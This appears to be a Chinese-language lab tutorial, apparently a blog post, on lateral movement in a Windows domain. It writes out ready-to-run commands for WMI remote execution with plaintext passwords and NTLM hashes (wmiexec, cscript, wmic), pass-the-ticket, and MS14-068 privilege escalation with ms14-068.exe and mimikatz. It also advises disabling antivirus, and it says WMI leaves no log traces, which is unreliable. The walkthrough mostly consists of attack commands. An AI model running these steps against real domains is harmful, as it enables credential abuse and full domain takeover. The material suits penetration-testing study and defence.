目录

wmi协议远程执行

ptt票据传递使用

命令传递方式

明文口令传递 

hash口令传递

票据分类

kerberos认证的简述流程

PTT攻击的过程

MS14-068 漏洞

执行过程

---

wmi协议远程执行

• wmi服务是比smb服务高级一些的，在日志中是找不到痕迹的，但是这个主要是传递的管理员用户凭据.
• 域横向移动WMI服务利用 cscript、wmiexec、wmic.
• WMI(Windows Management Instrumentation)是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹.

---

• netstat -ano -p tcp 
• 
• 遇到这两个端口大概率就是windows系统哟
• 域内主机执行以下命令 查看域控主机的相关信息类容
  • wmiexec
    • 套件impacket wmiexec明文或hash传递，有回显exe版本，可能被杀.
    • wmiexec.exe XIE0/administrator:"123@qq.com"@192.168.1.89 "whoami"
    • wmiexec.exe  都是一些python文件 只是生成了一些exe文件
    • 这个可以再github上查看pyton源码以及可执行文件.
    • 
      • 域hash传递命令
      • wmiexec.exe -hashes :3a3b8e860125a8a182550fe86e7f923f XIE0/administrator@192.168.1.89 "whoami"
      • 
  • cscript 有回显
    • 自带cscript明文传递，有回显，需要下载wmiexec.vbs配合,上传到对应域内磁盘文件夹下.
      • 
    • cscript //nologo wmiexec.vbs /shell 192.168.1.89 administrator "123@qq.com"
      • 来到域内主机
      • 
      • 执行完成后 窗口连接就指向了 域控主机了,但是如果域主机上有杀毒软件,那么就要退出杀毒,再执行. 
  • wmic 无回显
    • wmic /node:192.168.1.89 /user:administrator /password:"123@qq.com" process call create "cmd.exe /c ipconfig >C:\1.txt"
    • 
    • 再到域控主机上查看 c盘
    • 
    • 

ptt票据传递使用

• 命令传递方式

  • 明文口令传递 

  • hash口令传递

  • 票据分类

    • 票据口令传递-[ptt pass the ticker]
      • 金票{黄金票据} 
      • 银票{白银票据}

涉及到kerberos认证流程 参考 文章哟 !域渗透协议 详解之 : Kerberos 看看就明白是什么玩意了-CSDN博客

---

• kerberos认证的简述流程

  • 客户端需要向kdc授予票据 kdc: 秘钥分发中心 也就是可以理解成售票处
    • 黄金票据相当于伪造了一个售票处
  • 拿着授予的票据去访问服务端的服务
    • 伪造了需要访问的服务

PTT攻击的过程

MS14-068 漏洞

执行过程

• github地址有兴趣可以自行研究一下:
• https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
• 漏洞的原理使用的SID的方式进行的
• 这个漏洞是域提权漏洞，原理就和黄金票据相似，通过生成黄金票据，导入工具中，将一个普通权限的域用户获取域管的使用权限，从而达到控制整个域。

运用过程:

• 
• 该补丁没有打，猜测存在MS14-068漏洞
• 收集域信息
  • net time #获取域管账号
  • net config workstation #获取域信息
  • nltest /dsgetdc:moonsec #获取域管信息
     

1. 执行命令

• ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
• 查询sid
  • whoami /user
  • 
• 上传攻击工具

• 攻击命令
  • ms14-068.exe -u hack@xie.com -p 123@qq.com -s S-1-5-21-557645019-1356755253-2509318976-500 -d 192.168.1.89
  • 开始执行在win7域内主机上，执行完成后会创建一张TGT的预售票
    • 然后查看这张票下面有那些票。
  • 
  • klist 查看票
  • 
  • klist purge 清除票
  • 

  • ---

    也可以使用 mimikatz.exe 相关命令来处理

  •  上传mimikatz.exe
  • 
  • 执行以下命令
  • kerberos::purge #清空票据
  • kerberos::ptc 123.ccache #导入票据
    • 
    • mimikatz.exe "kerberos::ptc 123.ccache" "exit"
    • 
    • 在域内主机中 查看域控主机c盘的内容
    • 执行net time 获取域控主机名称
      • AD
    •  查看域控主机c盘中含有什么类容
      • dir \\AD.xie.com\c$
  • kerberos::list #查看票据
    •